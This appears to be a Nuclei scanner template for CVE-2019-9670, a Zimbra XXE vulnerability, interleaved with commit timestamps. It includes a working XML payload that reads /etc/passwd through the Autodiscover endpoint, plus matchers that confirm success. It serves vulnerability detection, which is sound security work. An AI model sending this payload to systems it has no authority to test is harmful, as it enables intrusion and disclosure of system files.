2021-01-02 04:59:06 +00:00
id : CVE-2019-9670
2020-10-29 10:53:46 +00:00
info :
2022-05-09 16:12:52 +00:00
name : Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection
2020-10-29 10:53:46 +00:00
author : ree4pwn
severity : critical
2022-05-09 16:12:52 +00:00
description : Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.
2021-09-10 11:26:40 +00:00
reference :
- https://www.exploit-db.com/exploits/46693/
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
- https://bugzilla.zimbra.com/show_bug.cgi?id=109129
- http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce
- http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html
- https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/
2022-05-09 16:12:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-9670
2022-04-22 10:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2019-9670
cwe-id : CWE-611
2022-08-27 04:41:18 +00:00
tags : cve,cve2019,zimbra,xxe,kev,edb,packetstorm
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2020-10-29 10:53:46 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-10-29 10:53:46 +00:00
- raw :
- |
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host : {{Hostname}}
Content-Type : application/xml
<!DOCTYPE xxe [
<!ELEMENT name ANY >
2020-10-30 05:31:43 +00:00
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
2020-10-29 10:53:46 +00:00
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
2022-03-17 08:06:15 +00:00
matchers-condition : and
2020-10-29 10:53:46 +00:00
matchers :
- type : regex
2022-03-17 08:06:15 +00:00
part : body
2020-10-29 10:53:46 +00:00
regex :
2022-03-22 08:01:31 +00:00
- 'root:.*:0:0:'
2022-03-17 08:06:15 +00:00
- "Problem accessing"
condition : and
- type : status
status :
2022-05-09 16:12:52 +00:00
- 503